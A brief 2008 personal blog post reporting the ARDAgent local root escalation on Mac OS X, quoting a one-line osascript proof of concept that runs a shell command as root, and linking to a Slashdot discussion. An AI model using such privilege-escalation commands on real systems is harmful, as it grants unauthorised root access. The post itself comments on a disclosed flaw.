Wandering Coder

Code, aimless meanderings and occasional outbursts from an Australian expatriate living in Singapore.

Thursday, June 19, 2008

ARDAgent Local Explot on OSX

Ouch... Nice one. # osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; root Hopefully this is patched soon. I'm sure there are some apps out there that could make creative use of this hole. This is discussed at length on Slashdot at, "Mac OS X Root Escalation Through AppleScript".
Posted by Scott Barr at 10:02 AM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Labels: apple, exploits, osx

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

About Me

My photo
Scott Barr
View my complete profile

Blog Archive

  • ►  2012 (2)
    • ►  February (1)
    • ►  January (1)
  • ►  2010 (6)
    • ►  July (1)
    • ►  June (1)
    • ►  April (2)
    • ►  January (2)
  • ►  2009 (8)
    • ►  December (2)
    • ►  November (2)
    • ►  March (2)
    • ►  February (2)
  • ▼  2008 (10)
    • ►  September (1)
    • ►  August (3)
    • ►  July (1)
    • ▼  June (5)
      • Re-Architecting J2EE with REST
      • MacBook Pro Trackpad Gestures
      • ARDAgent Local Explot on OSX
      • Firefox 3.0 is Shiny
      • Back in Singapore... Again!

Labels

  • apple
  • censorship
  • code
  • curl
  • debian
  • exploits
  • facebook
  • firefox
  • gem
  • gist
  • global it creations
  • goals
  • howto
  • iphone
  • j2ee
  • java
  • linux
  • macbook pro
  • memcached
  • michca
  • nginx
  • OSS
  • osx
  • passenger
  • privacy
  • rails
  • REST
  • ruby
  • singapore
  • SOA
  • tdd

My Blog List

  • Global IT Creations Blog
    Install Memcached from source on Debian
    15 years ago
Picture Window theme. Powered by Blogger.